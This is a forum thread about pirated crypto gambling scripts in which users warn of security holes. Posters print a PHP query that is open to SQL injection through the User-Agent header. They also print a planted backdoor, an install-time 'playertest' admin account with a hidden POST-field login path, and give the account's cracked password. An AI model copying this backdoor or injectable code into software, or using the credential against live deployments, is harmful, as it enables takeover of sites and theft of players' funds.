[Open Source] CryptoBlackJack & CryptoDice Gambling Scripts

[MarkMJ]

Just test the CryptoBlackJack
Have 3 backdoors but good for making a project
Sorry for user that drop this script.

[elm]

Just test the CryptoBlackJack
Have 3 backdoors but good for making a project
Sorry for user that drop this script.

are those 3 backdoors enough to get my coins?

[myfirst]

The admin login page is vulnerable to SQL injection.

Code:

mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.


Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first.

Is this issue specifically with this pirated copy or with the original as well?

[johny1976]

The admin login page is vulnerable to SQL injection.

Code:

mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.


Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first.

Is this issue specifically with this pirated copy or with the original as well?

Only this pirated copy, in our (original) version that is protected.

[ca333]

I am also in the process of looking through this script, I agree Downloaders beward of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters.

I will post my findings soon.

Backdoor Found

CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.

Code:

DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
  `id` int(255) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
  `passwd` text COLLATE utf8_unicode_ci NOT NULL,
  `ga_token` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)

Surprise Surprise

if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

Code:

if (!empty($_POST['ga_playertest'])) {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  } else {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  }

Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?

i cracked the md5 hash:

6d2aff483952d904179ca0c8c536a2c7:playertest1

I advice anybody to USE THE ORIGINAL version from johny1976 because the posted scripts have many backdoors and they are pirated copies with NO licence...